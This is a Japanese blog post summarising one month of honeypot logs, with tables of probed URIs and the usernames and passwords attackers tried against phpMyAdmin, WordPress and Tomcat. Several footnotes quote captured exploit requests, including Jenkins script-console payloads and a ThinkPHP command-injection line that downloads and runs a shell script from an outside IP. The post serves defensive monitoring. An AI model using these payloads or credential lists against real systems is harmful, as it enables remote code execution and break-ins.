Nickセキュリティログ

ハニーポット、バグバウンティ、CTFなどなどセキュリティ関係のことを備忘録がてら書いていきます

【ハニーポット】2019年5月 BW-pot観察まとめ

f:id:NickShadows:20190609105716j:plain

総評

全体的にしょぼくれた月でした。



私は基本的には新規アクセス攻撃アクセスくらいしか見ていないんですが、攻撃アクセスが無いのはまだしも新規アクセスもほぼなかったです。


このまとめを書いているのは6月なんですが、IPアドレスを変えたらアクセスが増えました


何らかの方法で新規のIPアドレスをチェックしてツールでスキャンしてるだけだとは思いますが、 母数は増えたほうが良さそうなので、2~3ヶ月おきにIPアドレス変えてみようと思います。

トップ画面

f:id:NickShadows:20190609105945p:plain:w600


1ヶ月折れ線グラフ

f:id:NickShadows:20190609110038p:plain:w600


GETリクエスト(トップ100)

no uri Co
1 / 1647
2 /manager/html 750
3 /pma/ 51
4 *1 38
5 /TP/public/index.php 23
6 /index.action 21
7 *2 21
8 /robots.txt 17
9 /w00tw00t.at.blackhats.romanian.anti-sec:) 17
10 /pma/scripts/setup.php 16
11 /phpMyAdmin/scripts/setup.php 16
12 /phpmyadmin/scripts/setup.php 15
13 /.well-known/security.txt 13
14 /favicon.ico 13
15 /sitemap.xml 13
16 /api/.env 12
17 /.env 11
18 /echo.php 11
19 /proxy_ip_is_here 11
20 /myadmin/scripts/setup.php 10
21 /wp-login.php 9
22 /MyAdmin/scripts/setup.php 9
23 /manager/html/ 8
24 /phpmy/scripts/setup.php 8
25 //vtigercrm/vtigerservice.php 8
26 /admin-scripts.asp 7
27 *3 7
28 /english/ 6
29 /wp-json/wp/v2/users/ 5
30 *4 5
31 ///?author=1 5
32 ///wp-json/wp/v2/users/ 5
33 //about.php 4
34 /mysql/scripts/setup.php 4
35 /HNAP1/ 4
36 //blog/ 4
37 /console/login/LoginForm.jsp 4
38 /latest/meta-data/ 4
39 //admin/config.php 4
40 /mysqladmin/scripts/setup.php 4
41 //recordings/ 4
42 //a2billing/customer/templates/default/footer.tpl 4
43 /pHpMyAdMiN/scripts/setup.php 4
44 /scripts/setup.php 3
45 /latest/meta-data 3
46 /websql/scripts/setup.php 3
47 /Login/ 3
48 /db/scripts/setup.php 3
49 /recordings/ 3
50 /a2billing/admin/Public/PP_error.php 3
51 /testget?q=23333&port=80 3
52 /jmx-console/ 3
53 /tftpboot/ 3
54 /moo 3
55 /admin/scripts/setup.php 3
56 /phpMyAdmin/setup.php 2
57 /wordpress6/wp-login.php 2
58 /wordpress/wp-login.php 2
59 /wp7/wp-login.php 2
60 /wp4/wp-login.php 2
61 /wp5/wp-login.php 2
62 /wordpress1/wp-login.php 2
63 /wordpress5/wp-login.php 2
64 /device.rsp?opt=user&cmd=list 2
65 /wp6/wp-login.php 2
66 /wp3/wp-login.php 2
67 /wp2/wp-login.php 2
68 /wp1/wp-login.php 2
69 /wp/wp-login.php 2
70 /phpmyadmin/setup.php 2
71 /wordpress3/wp-login.php 2
72 /acadmin.php 2
73 /wordpress2/wp-login.php 2
74 /proxyjudge.php 2
75 /judge.php 2
76 /MySQL/scripts/setup.php 2
77 /admin.php 2
78 /phpMyAdmin2/scripts/setup.php 2
79 /.git/config 2
80 /PMA/scripts/setup.php 2
81 /dbadmin/scripts/setup.php 2
82 /index.php 2
83 /phpmyadmin/index.php?lang=en&pma_username=nginx&pma_password=nginx 2
84 /wp8/wp-login.php 2
85 /phpmy-admin/scripts/setup.php 2
86 /Lists/admin.php 2
87 /nx8j78af1b.jsp 2
88 /esps/admin/main.jspx 2
89 /downloader/ 2
90 /php-my-admin/scripts/setup.php 2
91 /phpMyAdmin-2.8.0.4/scripts/setup.php 2
92 /mysql/admin/index.php?lang=en 2
93 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=2011 1
94 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=123qweasdzxc 1
95 /phpmyadmin/index.php?lang=en&pma_username=root&pma_password=database 1
96 /phpMyAdmin-2/scripts/setup.php 1
97 /phpmyadmin2/scripts/setup.php 1
98 /PMA2005/scripts/setup.php 1
99 /phpMyAdmin-2.11.11.3/scripts/setup.php 1
100 /php-myadmin/scripts/setup.php 1

*1

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;

*2

/TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

*3

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27nuAObHkS%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27nuAObHkS%27,%20version=%271%27)%0aimport%20nuAObHkS;

*4

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http[:]//81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;


POSTリクエスト

no uri Co
1 /tmUnblock.cgi 41
2 /TP/public/index.php?s=captcha 21
3 /users?page=&size=5 13
4 /sdk 3
5 /tmUnblock.cgi 3
6 /wp-login.php 2
7 /tmUnblock.cgi 2
8 /GponForm/diag_Form?images/ 2
9 /pma/index.php 1
10 /pma/index.php 1
11 /pma/index.php 1
12 /pma/index.php 1
13 /zabbix/index.php 1
14 /wp-login.php 1
15 /wp-login.php 1
16 /pma/index.php 1
17 /pma/index.php 1
18 /pma/index.php 1
19 /pma/index.php 1
20 /pma/index.php 1
21 /pma/index.php 1
22 /pma/index.php 1
23 /pma/index.php 1
24 /pma/index.php 1
25 /pma/index.php 1
26 /pma/index.php 1
27 /wp-login.php 1
28 /pma/index.php 1
29 /pma/index.php 1
30 /pma/index.php 1
31 /pma/index.php 1
32 /pma/index.php 1
33 /pma/index.php 1
34 /pma/index.php 1
35 /wp-login.php 1
36 /pma/index.php 1
37 /pma/index.php 1
38 /pma/index.php 1
39 /pma/index.php 1
40 /pma/index.php 1
41 /pma/index.php 1
42 /pma/index.php 1
43 / 1
44 /pma/index.php 1
45 /pma/index.php 1
46 /azenv.php?auth=155913765309941&a=PC&i=873348332&p=8080 1
47 /pma/index.php 1
48 /pma/index.php 1
49 /pma/index.php 1


pypmyadminユーザー

no user Co
1 root 40
2 admin 11
3 websrvc 4
4 server 2
5 nginx 2
6 project 1
7 popa3d 1


pypmyadminパスワード

no pwd Co
1 123456*a 8
2 root 5
3 password 5
4 secret 4
5 1234 4
6 12345 3
7 123456 2
8 admin 2
9 Million0999$ 2
10 nginx 2
11 mysql 2
12 2016 1
13 2015 1
14 popa3d 1
15 secure 1
16 whatever 1
17 project 1
18 music 1
19 abc123 1
20 321 1
21 users 1
22 54321 1
23 database 1
24 password2018 1
25 123qweasd 1
26 host 1
27 123qwe 1
28 123qweasdzxc 1
29 password1 1
30 files 1
31 2011 1
32 2017 1
33 qazwsx 1


wordpressユーザー

no user Co
1 admin 3
2 2
3 admin1 1


wordpressパスワード

no pwd Co
1 admin 2
2 null 2
3 admin1 1
4 admin123 1


tomcatユーザー

no user Co
1 admin 120
2 tomcat 119
3 manager 116
4 both 82
5 adminScript 82
6 user 82
7 administrator 82
8 39
9 root 34
10 password 1


tomcatパスワード

no pwd Co
1 59
2 admin 21
3 tomcat 21
4 manager 20
5 password 20
6 12345 18
7 s3cret 18
8 654321 18
9 123456 18
10 admin123 18
11 1234 18
12 123 18
13 111111 18
14 1qaz2wsx 18
15 letmein 14
16 1234567 14
17 12345678 14
18 master 14
19 monkey 14
20 888888 14
21 tomcat123 14
22 gts@05 14
23 welcome 14
24 qwerty 14
25 dragon 14
26 login 14
27 admin123!@# 14
28 football 14
29 baseball 14
30 666666 14
31 88888888 14
32 admin888 14
33 starwars 14
34 qwertyuiop 14
35 abc123 14
36 1234567890 14
37 123456789 14
38 princess 14
39 passw0rd 14
40 solo 14
41 root 6
42 rootroot 4
43 Passw0rd 4
44 root123 4
45 secret 4
46 123qwe 4
47 1111 4
48 toor 4
49 8888 4
50 4444 4
51 1 4
52 tomcattomcat 4
53 1qazxsw2 4
54 nimda 4
55 111 4
56 pass 4
57 321 4
58 0 4
59 Admin 4
60 1q2w3e4r 4
61 administrator 2
62 adminScript 2
63 both 2
64 user 2


スポンサーリンク